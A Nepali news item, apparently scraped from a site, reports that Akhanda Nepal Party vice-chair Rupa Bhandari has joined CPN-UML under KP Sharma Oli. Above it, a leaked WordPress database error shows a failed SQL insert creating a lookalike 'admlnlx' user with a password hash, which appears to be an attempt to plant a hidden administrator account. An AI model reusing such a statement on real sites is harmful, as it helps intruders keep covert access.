WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiNPJq0aNWPFidbMaeCn.9pZ65vrHV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:12:28', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ १९-
अखण्ड नेपाल पार्टीका केन्द्रीय उपाध्यक्ष रूपा भण्डारी आज नेकपा (एमाले)मा प्रवेश गरेकी छन्। पार्टी केन्द्रीय कार्यालय धुम्बाराहीमा आयोजित कार्यक्रममा अध्यक्ष केपी शर्मा ओलीले वन विज्ञान क्याम्पस पोखराका पूर्वप्राध्यापकसमेत रहेकी भण्डारीलाई पार्टी प्रवेश गराएका हुन्। नेत्री भण्डारीले अखण्ड पार्टीका अध्यक्ष कुमार खड्का वर्तमान सरकारमा सहभागी भएपछि आफूले सो पार्टी परित्याग गरेको र राष्ट्रिय स्वाभिमानको रक्षाका लागि एमाले दृढ देखिएकाले सो पार्टीमा प्रवेश गरेको बताए। रासस